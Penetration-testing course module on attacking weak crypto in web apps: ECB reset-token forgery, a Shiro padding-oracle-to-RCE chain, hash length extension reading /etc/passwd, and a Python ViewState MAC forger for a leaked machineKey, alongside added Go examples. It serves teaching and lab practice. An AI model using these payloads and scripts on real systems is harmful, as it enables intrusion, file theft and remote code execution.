
Web Application Penetration Testing eXtreme

Attacking Crypto
Section 01 | Module 12
© Caendra Inc. 2020
All Rights Reserved
Table of Contents

MODULE 12 | ATTACKING CRYPTO

12.1 Encryption Fundamentals
12.2 Insecure Password Reset
12.3 Padding Oracle Attack
12.4 Hash Length Extension Attack
12.5 Leveraging machineKey
12.6 Subverting HMAC in Node.js

WAPTXv2: Section 01, Module 12 - Caendra Inc. © 2020 | p.2


Learning Objectives

By the end of this module, you should have a better understanding of:

✓ Common weaknesses in crypto implementations
✓ How to find and exploit weak crypto


12.1 Encryption Fundamentals


12.1.1 Cryptography

Cryptography is of paramount importance when it comes to storing and passing information in today’s dynamic web applications.

In this section, we’ll talk about exploiting insecure crypto implementations used in web applications. But before doing so, let’s cover some encryption fundamentals.


12.1.2 Key Encryption Terms

Let’s start by explaining the terms below.

1. Encryption
2. Ciphers
3. ECB – Electronic Code Book
4. CBC – Cipher Block Chaining
5. Padding


12.1.2.1 Encryption

Encryption is defined as the transformation of plaintext into ciphertext. Ciphertext should not be easily comprehended by anyone except authorized parties.

• Symmetric encryption (also known as secret key cryptography): a single key is shared between the communication peers and used both to encrypt and to decrypt data
• Asymmetric encryption (also known as public key cryptography): a public and private key pair is used between the communication peers to encrypt and decrypt data
12.1.2.2 Ciphers

A cipher is an algorithm that performs encryption or decryption of data through a series of well-defined steps.

• Stream ciphers: data are encrypted one unit at a time, as a continuous stream
• Block ciphers: data are encrypted in fixed-size blocks


12.1.2.3 Electronic Code Book (ECB)

• ECB is a mode of operation for a block cipher
• The plaintext to be encrypted is divided into blocks. Each block will result in a corresponding ciphertext block
• The same plaintext block will always produce the same ciphertext block

https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation


12.1.2.4 Cipher Block Chaining (CBC)

• CBC is a mode of operation for a block cipher
• Each block of plaintext is XORed with the previous ciphertext block before being encrypted
• An initialization vector (IV) takes the place of the "previous block" for the first block, so that each message encrypts differently

https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation


12.1.2.5 Padding

• In block cipher modes, encryption takes place in the aforementioned fixed-size blocks, and padding is used to ensure that cleartext data of arbitrary size exactly fit one or more blocks of the fixed input size.
• The padding consists of the number of bytes missing from the last block and is appended to the plaintext. See the example below.

[Padding example image not reproduced] Image credits: https://twitter.com/beingsecure
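To make the three definitions above concrete, here is an added Go example (it is not part of the course material) that pads a constructed plaintext with PKCS#7 and encrypts it with AES in ECB and in CBC mode using only Go's standard library; the 16-byte key and the plaintext are made up for the demo. It shows the property the slides describe: in ECB, two identical plaintext blocks produce two identical ciphertext blocks and the output is the same on every run, while CBC with a fresh random IV hides the repetition and yields a different ciphertext every time. The hasRepeatedBlock check is the same test a pentester applies to recognise ECB in the wild.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"fmt"
)

// pkcs7Pad appends n bytes of value n (1 <= n <= blockSize) so that the result is a
// whole number of blocks; an already aligned input gets a full extra block, which is
// what lets the receiver strip the padding unambiguously.
func pkcs7Pad(data []byte, blockSize int) []byte {
	n := blockSize - len(data)%blockSize
	return append(append([]byte{}, data...), bytes.Repeat([]byte{byte(n)}, n)...)
}

// encryptECB encrypts every padded block independently, so identical plaintext blocks
// always map to identical ciphertext blocks and the output is fully deterministic.
func encryptECB(key, plaintext []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	bs := block.BlockSize()
	padded := pkcs7Pad(plaintext, bs)
	out := make([]byte, len(padded))
	for i := 0; i < len(padded); i += bs {
		block.Encrypt(out[i:i+bs], padded[i:i+bs])
	}
	return out, nil
}

// encryptCBC XORs each plaintext block with the previous ciphertext block (the IV for
// the first one) before encrypting it. The random IV is prepended to the output.
func encryptCBC(key, plaintext []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	bs := block.BlockSize()
	padded := pkcs7Pad(plaintext, bs)
	out := make([]byte, bs+len(padded))
	if _, err := rand.Read(out[:bs]); err != nil {
		return nil, err
	}
	cipher.NewCBCEncrypter(block, out[:bs]).CryptBlocks(out[bs:], padded)
	return out, nil
}

// hasRepeatedBlock reports whether any block occurs twice in data. Repeated ciphertext
// blocks are the classic sign that ECB mode is in use.
func hasRepeatedBlock(data []byte, blockSize int) bool {
	seen := make(map[string]bool)
	for i := 0; i+blockSize <= len(data); i += blockSize {
		b := string(data[i : i+blockSize])
		if seen[b] {
			return true
		}
		seen[b] = true
	}
	return false
}

func main() {
	key := []byte("0123456789abcdef") // constructed demo key; never use a fixed key in practice
	// Constructed input: two identical 16-byte blocks followed by a short tail that needs padding.
	plaintext := append(bytes.Repeat([]byte("A"), 32), []byte("tail")...)

	ecb, _ := encryptECB(key, plaintext)
	cbc1, _ := encryptCBC(key, plaintext)
	cbc2, _ := encryptCBC(key, plaintext)

	fmt.Printf("plaintext %d bytes, padded to %d\n", len(plaintext), len(pkcs7Pad(plaintext, 16)))
	fmt.Printf("ECB: blocks 1 and 2 equal=%v, repeated block detected=%v\n",
		bytes.Equal(ecb[:16], ecb[16:32]), hasRepeatedBlock(ecb, 16))
	fmt.Printf("CBC: repeated block detected=%v, two encryptions equal=%v\n",
		hasRepeatedBlock(cbc1[16:], 16), bytes.Equal(cbc1, cbc2))
}
```

Run it with go run; the padded length it prints (48 for the 36-byte input) also illustrates that PKCS#7 always adds at least one byte, so a 16-byte input would grow to 32.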
12.1.3 Attacks Against Crypto
It is about time we start talking about identifying and exploiting insecure crypto implementations. The attacks against crypto implementations can be divided as follows.

Ciphertext-Only Attack (COA)
• The attacker has access to a set of ciphertexts

Chosen-Ciphertext Attack (CCA)
• The attacker can choose different ciphertexts to be decrypted and obtain the corresponding plaintexts

Known Plaintext Attack (KPA)
• The attacker knows the plaintext and its encrypted version (ciphertext)

Chosen Plaintext Attack (CPA)
• The attacker can encrypt plaintexts of his choice
12.2 Insecure Password Reset


12.2.1 Known Plaintext Attack Scenario

The first attack scenario we will cover is an insecure password reset implementation (thanks to NotSoSecure for the demo code and application).

Under the hood, the user’s email id is used and encrypted by the application to generate a password reset token. See the encryption implementation on your right (AES encryption in ECB mode).

https://www.notsosecure.com/
12.2.2 Exploitation

The aforementioned encryption implementation is unfortunately insecure, since it generates the same ciphertext for a given plaintext regardless of its “location” (ECB mode does not take a block’s position into account).

This means that if an attacker wants to take over the account [email protected], he can register email addresses such as [email protected] and [email protected] and then request a password reset.

Due to the insecure encryption, the attacker will take the common portion of the received tokens, which will be a perfectly valid password reset token for [email protected], and successfully reset the targeted account’s password.

Even if you are not aware of the encryption being employed under the hood, make sure you try this method during your penetration tests.


12.2.2 Exploitation

As you may have already guessed, we have just performed a Known Plaintext Attack (KPA), since we were in the position of knowing both the plaintext and the ciphertext.
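The weakness in this scenario is that the token is a deterministic function of the e-mail address, so tokens issued for attacker-registered accounts reveal the token of the victim. The Go code below is an added example of the design that removes that property (it is not NotSoSecure's demo code and not part of the course): tokens are random, only their SHA-256 digest is stored, they expire, and they are consumed on first use. The account names are constructed for the demo.

```go
package main

import (
	"crypto/rand"
	"crypto/sha256"
	"crypto/subtle"
	"encoding/base64"
	"errors"
	"fmt"
	"sync"
	"time"
)

// ErrInvalidToken is returned for every failed redemption, so the response does not
// tell the caller which check (existence, expiry, account) failed.
var ErrInvalidToken = errors.New("invalid or expired reset token")

// resetRecord is all the server keeps: the account and the expiry, indexed by the
// token's digest. The raw token is never stored, so a database leak exposes no usable tokens.
type resetRecord struct {
	email   string
	expires time.Time
}

// ResetStore issues and redeems single-use, expiring password reset tokens. Tokens are
// random rather than derived from the e-mail address, so a token for one account carries
// no information about any other account's token.
type ResetStore struct {
	mu      sync.Mutex
	ttl     time.Duration
	now     func() time.Time // injectable clock so expiry is testable
	records map[[sha256.Size]byte]resetRecord
}

func NewResetStore(ttl time.Duration) *ResetStore {
	return &ResetStore{ttl: ttl, now: time.Now, records: make(map[[sha256.Size]byte]resetRecord)}
}

// Issue generates a fresh 256-bit token for email, stores only its SHA-256 digest and
// returns the token once (this is the value that would be sent by e-mail).
func (s *ResetStore) Issue(email string) (string, error) {
	raw := make([]byte, 32)
	if _, err := rand.Read(raw); err != nil {
		return "", err
	}
	token := base64.RawURLEncoding.EncodeToString(raw)
	s.mu.Lock()
	defer s.mu.Unlock()
	s.records[sha256.Sum256([]byte(token))] = resetRecord{email: email, expires: s.now().Add(s.ttl)}
	return token, nil
}

// Redeem validates a presented token for the given account and consumes it, so it cannot
// be replayed. The token is deleted before the remaining checks run: a token presented
// against the wrong account is burned rather than left available for another try.
func (s *ResetStore) Redeem(email, token string) error {
	key := sha256.Sum256([]byte(token))
	s.mu.Lock()
	defer s.mu.Unlock()
	rec, ok := s.records[key]
	if !ok {
		return ErrInvalidToken
	}
	delete(s.records, key)
	if s.now().After(rec.expires) {
		return ErrInvalidToken
	}
	if subtle.ConstantTimeCompare([]byte(rec.email), []byte(email)) != 1 {
		return ErrInvalidToken
	}
	return nil
}

func main() {
	store := NewResetStore(15 * time.Minute)
	// Constructed demo account; two requests for the same account give unrelated tokens.
	t1, _ := store.Issue("alice@example.test")
	t2, _ := store.Issue("alice@example.test")
	fmt.Println("tokens for the same account differ:", t1 != t2)
	fmt.Println("first redemption:", store.Redeem("alice@example.test", t1))
	fmt.Println("replay of the same token:", store.Redeem("alice@example.test", t1))
	fmt.Println("token used for another account:", store.Redeem("mallory@example.test", t2))
}
```

Every failure path returns the same ErrInvalidToken so that an HTTP layer built on top cannot leak whether a token existed, had expired or belonged to someone else, and the account comparison uses subtle.ConstantTimeCompare for the same reason.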


12.3 Padding Oracle Attack


12.3.1 What is a Padding Oracle?
In Web Application Penetration Testing, an Oracle is any application functionality, error message or behavior that can reveal valuable information (as a response to different input).

When it comes to attacks against crypto, one of the best-known Oracle-based attacks is the Padding Oracle attack, which leverages proper and improper padding as a means of gaining application information.

Specifically, Padding Oracle attacks target CBC-mode decryption functions operating with PKCS7 padding. A Padding Oracle can reveal whether the padding is correct for a given ciphertext.

https://robertheaton.com/2013/07/29/padding-oracle-attack/
http://seffyvon.github.io/cryptography/2014/08/20/CBC-Padding-Oracle-Attacks/
12.3.1 What is a Padding Oracle?

Another resource on practical Padding Oracle attacks can be found below.
http://netifera.com/research/poet/PaddingOracleBHEU10.pdf


12.3.1 What is a Padding Oracle?
At this point we should also mention Intermediate Values. Intermediate values are the output of the block cipher during the block cipher process.

Essentially, they can be seen as the state of a ciphertext block after decryption and before the XOR operation with the previous ciphertext block.

Once intermediate bytes are found, deciphering the plaintext of the corresponding ciphertext is easy.
12.3.2 Padding Oracle Attack Scenario
Let’s now go through a Padding Oracle attack scenario against Apache Shiro.

Apache Shiro is a powerful and easy-to-use Java security framework that has functions to perform authentication, authorization, password, and session management.

Older Shiro versions suffered from a Padding Oracle vulnerability that, when chained with another deserialization-based vulnerability, could result in remote code execution.
12.3.2 Padding Oracle Attack Scenario
Specifically, Shiro used AES-128-CBC to encrypt cookies, enabling Padding Oracle attacks (the RememberMe cookie is of interest in this case).

Shiro also used CookieRememberMeManager by default, which serialized, encrypted, and encoded the user's identity for later retrieval. See the flowchart on your right.

The Padding Oracle vulnerability can result in an attacker creating a malicious object, serializing it, encoding it and finally sending it as a cookie. Shiro will then decode and deserialize it.

Unfortunately, the deserialization implementation of the affected Shiro versions was also insecure. By chaining the Padding Oracle vulnerability with the deserialization-based one, remote code execution was possible.

https://shiro.apache.org/static/1.2.2/apidocs/org/apache/shiro/web/mgt/CookieRememberMeManager.html
12.3.2 Padding Oracle Attack Scenario
The Padding Oracle part has been explained quite nicely (in a simplified manner) in the post below.
https://www.anquanke.com/post/id/192819

“Select a string, P, that you want to generate ciphertext, C, for.
Pad the string to be a multiple of the blocksize, using appropriate padding, then split it into blocks numbered from 1 to N.
Generate a block of random data (CN – ultimately, the final block of ciphertext).
For each block of plaintext, starting with the last one…
• Create a two-block string of ciphertext, C’, by combining an empty block (00000…) with the most recently generated ciphertext block (Cn+1) (or the random one if it’s the first round)
• Change the last byte of the empty block until the padding errors go away, then use math to set the last byte to 2 and change the second-last byte till it works. Then change the last two bytes to 3 and figure out the third-last, fourth-last, etc.
• After determining the full block, XOR it with the plaintext block Pn to create Cn
• Repeat the above process for each block (prepend an empty block to the new ciphertext block, calculate it, etc.)

To put that in English: each block of ciphertext decrypts to an unknown value, then is XOR’d with the previous block of ciphertext. By carefully selecting the previous block, we can control what the next block decrypts to. Even if the next block decrypts to a bunch of garbage, it’s still being XOR’d to a value that we control, and can therefore be set to anything we want.”


12.3.2 Padding Oracle Attack Scenario
To demonstrate this attack, we have set up our own vulnerable environment using Apache Shiro 1.4.1 + tomcat:8-jre8.

First:
git clone https://github.com/apache/shiro.git
cd shiro
git checkout shiro-root-1.4.1
mvn install

Then:
cd samples/web
mvn install

Finally, copy the samples-web-1.4.1.war package (samples/target/) obtained after compilation to the Tomcat webapps directory, and start Tomcat.


12.3.2 Padding Oracle Attack Scenario
The attack flow is as follows:
1. First, we logged in to the website (sample credentials are provided on the login page), checked “Remember Me” and obtained a legitimate cookie using Burp.


12.3.2 Padding Oracle Attack Scenario

2. Then, we used ysoserial to create our serialized payload (which simply creates a file named success inside the /tmp directory) and saved it to a file called payload.class.


12.3.2 Padding Oracle Attack Scenario
3. Next, we downloaded the publicly available exploit (https://github.com/wuppp/shiro_rce_exp/blob/master/shiro_exp.py) and used the captured rememberMe cookie as a prefix for the Padding Oracle attack, as follows.


12.3.2 Padding Oracle Attack Scenario
4. After a couple of hours the exploit script provided us with a valid (properly encrypted thanks to the Padding Oracle attack) cookie containing our payload. This cookie will be deserialized by the vulnerable server.


12.3.2 Padding Oracle Attack Scenario
5. Finally, using Burp’s Repeater, we issued a request with our crafted cookie. The result was remote code execution. The Padding Oracle attack enabled the attack: without it, crafting a properly encrypted cookie would not be possible.


12.3 Padding Oracle Attack

For completeness’ sake we should mention that Padding Oracle attacks are Chosen-Ciphertext Attacks (CCA).


12.4 Hash Length Extension Attack


12.4.1 Hash Length Extension Attack Fundamentals

There are web applications that prepend a secret value to data, hash the result with a flawed algorithm and provide the user with both the data and the hash, but not the secret.

On the other side of the communication, the server relies on the secret for data validation purposes.


12.4.1 Hash Length Extension Attack Fundamentals

An attacker who doesn’t know the value of the secret can still generate a valid hash for {secret || data || attacker_controlled_data}. This is possible because an attacker can pick up from where the hashing algorithm left off. The state that is needed in order to continue a hash is included in the output of the majority of hashing algorithms. By loading that state into an appropriate hash structure, we can continue hashing.

In simpler terms, an attacker can calculate a valid hash for a message without knowing the value of the secret. He can do that by just guessing its length. Hashes are calculated in blocks and the hash of one block is the state for the next block.
12.4.1 Hash Length Extension Attack Fundamentals

The above attacker actions are known as a Hash Length Extension attack. Let’s see an example.

Request:
stock_quantity=20&price=1000
Hash:
[secretpass|stock_quantity=20&price=1000|padding] => Hash1/State1
Final Request:
stock_quantity=20&price=1000&hash=Hash1

If an attacker manages to identify the length of the padding, he will have all the info needed to calculate a new hash.
12.4.1 Hash Length Extension Attack Fundamentals

Attack Hash:
[secretpass|stock_quantity=20&price=1000|padding|&price=100]

Attack Hash:
[State1|&price=10] => Hash2/State2

Final Request:
stock_quantity=20&price=1000+padding&price=100&hash=Hash2
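The state continuation behind the Hash1/State1 notation above is easiest to see with a hash whose internal state you can set yourself. The Go program below is an added example (it is not part of the course and not hash_extender's code): it implements SHA-1's compression function and Merkle-Damgård padding, reuses them to resume hashing from a published digest, and reproduces the slides' stock_quantity/price example with the constructed secret "secretpass". lengthExtend builds the request the server will hash after its secret (data || glue padding || suffix) together with a matching tag without ever touching the secret, and the same call against an HMAC-SHA1 tag shows why HMAC is the fix.

```go
package main

import (
	"crypto/hmac"
	"crypto/sha1"
	"encoding/binary"
	"fmt"
	"math/bits"
)

// sha1IV is SHA-1's fixed starting state; a digest is simply the state after the last block.
var sha1IV = [5]uint32{0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476, 0xC3D2E1F0}

// sha1Compress absorbs one 64-byte block into the chaining state h (FIPS 180-4 SHA-1).
func sha1Compress(h *[5]uint32, block []byte) {
	var w [80]uint32
	for i := 0; i < 16; i++ {
		w[i] = binary.BigEndian.Uint32(block[4*i:])
	}
	for i := 16; i < 80; i++ {
		w[i] = bits.RotateLeft32(w[i-3]^w[i-8]^w[i-14]^w[i-16], 1)
	}
	a, b, c, d, e := h[0], h[1], h[2], h[3], h[4]
	for i := 0; i < 80; i++ {
		var f, k uint32
		switch {
		case i < 20:
			f, k = (b&c)|(^b&d), 0x5A827999
		case i < 40:
			f, k = b^c^d, 0x6ED9EBA1
		case i < 60:
			f, k = (b&c)|(b&d)|(c&d), 0x8F1BBCDC
		default:
			f, k = b^c^d, 0xCA62C1D6
		}
		t := bits.RotateLeft32(a, 5) + f + e + k + w[i]
		e, d, c, b, a = d, c, bits.RotateLeft32(b, 30), a, t
	}
	h[0], h[1], h[2], h[3], h[4] = h[0]+a, h[1]+b, h[2]+c, h[3]+d, h[4]+e
}

// mdPadding is what SHA-1 appends to an msgLen-byte message: 0x80, zeros up to 56 mod 64,
// then the bit length as a big-endian uint64. This is the "padding" on the slides.
func mdPadding(msgLen int) []byte {
	pad := []byte{0x80}
	for (msgLen+len(pad))%64 != 56 {
		pad = append(pad, 0)
	}
	var length [8]byte
	binary.BigEndian.PutUint64(length[:], uint64(msgLen)*8)
	return append(pad, length[:]...)
}

// sha1Resume continues SHA-1 from state, which already covers alreadyLen bytes (a multiple
// of 64), over tail. Started from sha1IV with alreadyLen 0 it is ordinary SHA-1.
func sha1Resume(state [5]uint32, alreadyLen int, tail []byte) []byte {
	msg := append(append([]byte{}, tail...), mdPadding(alreadyLen+len(tail))...)
	for i := 0; i < len(msg); i += 64 {
		sha1Compress(&state, msg[i:i+64])
	}
	out := make([]byte, 20)
	for i, v := range state {
		binary.BigEndian.PutUint32(out[4*i:], v)
	}
	return out
}

// lengthExtend takes tag = SHA1(secret || data), a guess for len(secret), the known data and
// a suffix; it returns data || glue || suffix and a tag valid for secret || that, without the secret.
func lengthExtend(tag []byte, secretLen int, data, suffix []byte) ([]byte, []byte) {
	var state [5]uint32
	for i := range state {
		state[i] = binary.BigEndian.Uint32(tag[4*i:]) // the published digest is the chaining state
	}
	glue := mdPadding(secretLen + len(data))
	msg := append(append(append([]byte{}, data...), glue...), suffix...)
	return msg, sha1Resume(state, secretLen+len(data)+len(glue), suffix)
}

// flawedTag is the construction the slides attack: SHA1(secret || message).
func flawedTag(secret, msg []byte) []byte {
	s := sha1.Sum(append(append([]byte{}, secret...), msg...))
	return s[:]
}

// hmacTag is the fix: HMAC-SHA1 hashes the inner digest again under the key, so no resumable state leaks.
func hmacTag(secret, msg []byte) []byte {
	m := hmac.New(sha1.New, secret)
	m.Write(msg)
	return m.Sum(nil)
}

func main() {
	secret := []byte("secretpass") // constructed; lengthExtend only ever uses its length
	data, suffix := []byte("stock_quantity=20&price=1000"), []byte("&price=100")
	msg, forged := lengthExtend(flawedTag(secret, data), len(secret), data, suffix)
	fmt.Printf("request the server sees: %q\n", msg)
	fmt.Println("SHA1(secret||data) accepts forged tag:", hmac.Equal(flawedTag(secret, msg), forged))
	_, forgedH := lengthExtend(hmacTag(secret, data), len(secret), data, suffix)
	fmt.Println("HMAC-SHA1 accepts forged tag:", hmac.Equal(hmacTag(secret, msg), forgedH))
}
```

sha1Resume started from sha1IV with zero bytes already covered is plain SHA-1, which gives a convenient self-check against crypto/sha1. In the real scenario the secret length is unknown, which is why a tool like hash_extender is asked for a range of lengths and produces one candidate per length for the tester to try.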




12.4.1 Hash Length Extension Attack Fundamentals

One of the best resources to dive into the calculations required during Hash Length Extension Attacks is the below.
https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks
12.4.2 Hash Length Extension Attack Scenario

Let’s now go through a Hash Length Extension attack scenario against the vulnerable CryptOMG application.

Challenge 5 is what we need in order to witness how a Hash Length Extension can be performed.

https://github.com/SpiderLabs/CryptOMG


12.4.2 Hash Length Extension Attack Scenario

By navigating to Challenge 5, we come across the below.


12.4.2 Hash Length Extension Attack Scenario

Clicking on “hello”, “test” etc. and looking at both the requests and the responses makes us think that the application “prints” the contents of local files. By picking various algorithms we can also identify the possible parameters.
12.4.2 Hash Length Extension Attack Scenario

Something else that we should notice is that, regardless of the size of the file name input, the output is always the same size.

The above suggests that a hashing algorithm may be in use. This algorithm could be SHA1 (due to the fixed output length), but if we try (echo -n pictures | sha1sum) locally, the SHA1 sum we get is different from the one shown by the application.

We are most probably up against a Message Authentication Code: the application must be adding something to the hash apart from the file name. We remind you that in a MAC a secret value is combined with the data and the outcome is hashed.

Luckily, such an implementation is vulnerable to Hash Length Extension Attacks!


12.4.2 Hash Length Extension Attack Scenario

Let’s try reading the contents of /etc/passwd by executing a Hash Length Extension Attack.

As previously covered, we don’t need to know the secret value being used. We only need to successfully guess the length of the secret.

For this task we can use hash_extender as follows.
• Specify a known hash value
• Specify an estimation regarding the secret’s length (between 10 and 40 bytes)
• We will have to experiment with the amount of ../../ to be used

./hash_extender -f sha1 --data 'test' -s dd03bd22af3a4a0253a66621bcb80631556b100e --append '../../../../../../../../../etc/passwd' --secret-min=10 --secret-max=40 --out-data-format=html --table > payloads.out

https://github.com/iagox86/hash_extender


12.4.2 Hash Length Extension Attack Scenario

Let’s now use hash_extender’s output (payloads.out) inside Burp’s Intruder, in order to see if our guesses were successful. We will follow a Sniper approach, as follows.


12.4.2 Hash Length Extension Attack Scenario

Eventually, we are able to see the content of /etc/passwd by means of a Hash Length Extension attack!


12.5 Leveraging machineKey


12.5.1 The importance of machineKey
The Machine Key is the cardinal feature that is used to specify encryption settings for application services, such as view state, forms authentication and roles in a system.

The Machine Key contains a set of fields, such as the validation key and the decryption key, where unique keys are to be entered. Specifying a machine key looks as follows.

https://msdn.microsoft.com/en-us/data/w8h3skw9(v=vs.110)


12.5.1 The importance of machineKey

The attributes and elements of a machine key can be seen on your right.

https://msdn.microsoft.com/en-us/data/w8h3skw9(v=vs.110)


12.5.2 Leveraging a leaked machineKey for RCE

Suppose we are pentesting a .NET application (residing at 192.168.227.135).

1. The application offers file uploading functionality (the ".aspx", ".config", ".ashx", ".asmx", ".aspq", ".axd", ".cshtm", ".cshtml", ".rem", ".soap", ".vbhtm", ".vbhtml", ".asa", ".asp" and ".cer" extensions are blacklisted)
2. Validation of the viewstate MAC is performed (this prevents deserialization exploitation without knowing the cryptographic key, the machineKey)


12.5.2 Leveraging a leaked machineKey for RCE

At this point, our only chance of bypassing authorization in general and achieving high-impact exploitation is by finding the machine key.

The vast majority of extensions that could help us are unfortunately blacklisted. That being said, the Server Side Attacks module includes a nice trick that can help us move further in this situation: Server Side Include.


12.5.2 Leveraging a leaked machineKey for RCE

We can try uploading the following, in an attempt to leak the machine key.


12.5.2 Leveraging a leaked machineKey for RCE

Thankfully, our attempt was successful. We got access to the web.config file (we used View Source Code to retrieve its contents).


12.5.2 Leveraging a leaked machineKey for RCE

Now, the last obstacle to bypass. We need to figure out how the MAC is generated and verified. To answer this we will need to dig into the below.
https://referencesource.microsoft.com/#system.web/UI/ObjectStateFormatter.cs (focus on lines 756-812)
https://referencesource.microsoft.com/#System.Web/Configuration/MachineKeySection.cs (focus on lines 786-818, 847-866 and 1211-1230)

If you read the above, you will arrive at the logic below (pseudocode).
MAC_HASH = MD5(serialized_data_binary + validation_key + 0x00000000)
VIEWSTATE = Base64_Encode(serialized_data_binary + MAC_HASH)
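The verifier side of that pseudocode, as an added Go example (it is not the page's exploit and not ASP.NET's own code; it models only the MD5 scheme the slide describes, with a placeholder key): signViewState produces Base64(data || MD5(data || validation_key || 0x00000000)) and verifyViewState does what the server has to do on the way in, splitting off the 16-byte MAC, recomputing it and comparing in constant time before the data is allowed anywhere near a deserializer.

```go
package main

import (
	"crypto/hmac"
	"crypto/md5"
	"encoding/base64"
	"errors"
	"fmt"
)

var ErrViewStateMAC = errors.New("viewstate MAC validation failed")

// viewStateMAC follows the slide's pseudocode: MD5(data || validationKey || 0x00000000).
func viewStateMAC(data, validationKey []byte) []byte {
	h := md5.New()
	h.Write(data)
	h.Write(validationKey)
	h.Write([]byte{0, 0, 0, 0})
	return h.Sum(nil)
}

// signViewState produces Base64(data || MAC), the value that travels to the client.
func signViewState(data, validationKey []byte) string {
	return base64.StdEncoding.EncodeToString(append(append([]byte{}, data...), viewStateMAC(data, validationKey)...))
}

// verifyViewState is the server-side check: split off the 16-byte MAC, recompute it with
// the validation key and compare in constant time; only then may the data reach the
// deserializer. The check is exactly as strong as the secrecy of the key: whoever can read
// web.config can run signViewState themselves.
func verifyViewState(viewState string, validationKey []byte) ([]byte, error) {
	raw, err := base64.StdEncoding.DecodeString(viewState)
	if err != nil || len(raw) < md5.Size {
		return nil, ErrViewStateMAC
	}
	data, tag := raw[:len(raw)-md5.Size], raw[len(raw)-md5.Size:]
	if !hmac.Equal(tag, viewStateMAC(data, validationKey)) {
		return nil, ErrViewStateMAC
	}
	return data, nil
}

func main() {
	key := []byte("constructed-validation-key") // placeholder, not a real machineKey value
	vs := signViewState([]byte("serialized state goes here"), key)
	fmt.Println("viewstate:", vs)
	data, err := verifyViewState(vs, key)
	fmt.Printf("verified with the right key: %q (err=%v)\n", data, err)
	_, err = verifyViewState(vs, []byte("wrong-key"))
	fmt.Println("verified with another key:", err)
}
```

The check fails closed for a wrong key, a truncated value and invalid Base64, but it has no defence against someone who holds the validation key, which is why the leaked web.config in the slides that follow is decisive.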
12.5.2 Leveraging a leaked machineKey for RCE

For the exploitation part, we will need ysoserial.net and to implement the MAC-related logic of the previous slide.

12.5.2 Leveraging a leaked machineKey for RCE

#!/usr/bin/env python3
import hashlib
import base64

serialized_data = '{the output of ysoserial.net goes here}'
payload = base64.b64decode(serialized_data)

# Get machine key by uploading .shtml file (Server Side Include)
validation_key = bytes.fromhex('b07b0f97365416288cf0247cffdf135d25f6be87')

'''
MAC_Hash = MD5(serialized_data_binary + validation_key + 0x00000000 )

Simple stack trace to get MAC Hash:
System.Web.UI.ObjectStateFormatter.Serialize(object stateGraph, Purpose purpose)
MachineKeySection.GetEncodedData(byte[] buf, byte[] modifier, int start, ref int length)
MachineKeySection.HashData(byte[] buf, byte[] modifier, int start, int length)
HashDataUsingNonKeyedAlgorithm(HashAlgorithm hashAlgo, byte[] buf, byte[] modifier, int start, int length, byte[] validationKey)
UnsafeNativeMethods.GetSHA1Hash(byte[] data, int dataSize, byte[] hash, int hashSize);
'''

# MAC = MD5(data || validation_key || 0x00000000), then VIEWSTATE = Base64(data || MAC)
mac = hashlib.md5(payload + validation_key + b'\x00\x00\x00\x00').digest()
payload = base64.b64encode(payload + mac).decode()
print(payload)

Credits to [email protected] for the exploit
12.5.2 Leveraging a leaked machineKey for RCE

Remote code execution was achieved!


12.5.2 Leveraging a leaked machineKey for RCE

In this case, we didn’t attack crypto per se. Instead we leveraged the SSI feature of the underlying server to leak the cryptographic key.

Implementing strong crypto is important, but protecting the cryptographic key is of equal importance!


12.6 Subverting HMAC in Node.js


12.6.1 Subverting HMAC in Node.js Scenario

At the end of the course we will also present you with an example where HMAC can be subverted through Remote Memory Disclosure in Node.js.

The source code of the vulnerable application will be provided as well, so that you can try the attack locally.

https://en.wikipedia.org/wiki/HMAC




References

Block cipher mode of operation
https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation

Not So Secure
https://www.notsosecure.com/

The Padding Oracle Attack
https://robertheaton.com/2013/07/29/padding-oracle-attack/

CBC Padding Oracle Attacks
http://seffyvon.github.io/cryptography/2014/08/20/CBC-Padding-Oracle-Attacks/

Practical Padding Oracle Attacks
http://netifera.com/research/poet/PaddingOracleBHEU10.pdf

Class CookieRememberMeManager
https://shiro.apache.org/static/1.2.2/apidocs/org/apache/shiro/web/mgt/CookieRememberMeManager.html

Shiro RCE again (Padding Oracle Attack)
https://www.anquanke.com/post/id/192819

wuppp/shiro_rce_exp
https://github.com/wuppp/shiro_rce_exp/blob/master/shiro_exp.py

Everything you need to know about hash length extension attacks
https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks

SpiderLabs/CryptOMG
https://github.com/SpiderLabs/CryptOMG

iagox86/hash_extender
https://github.com/iagox86/hash_extender

machineKey Element (ASP.NET Settings Schema)
https://msdn.microsoft.com/en-us/data/w8h3skw9(v=vs.110)

ObjectStateFormatter.cs
https://referencesource.microsoft.com/#system.web/UI/ObjectStateFormatter.cs

MachineKeySection.cs
https://referencesource.microsoft.com/#System.Web/Configuration/MachineKeySection.cs

HMAC
https://en.wikipedia.org/wiki/HMAC


Labs
Padding Oracle Attack
In this lab, students will have the opportunity to perform a padding
oracle attack against a vulnerable application.
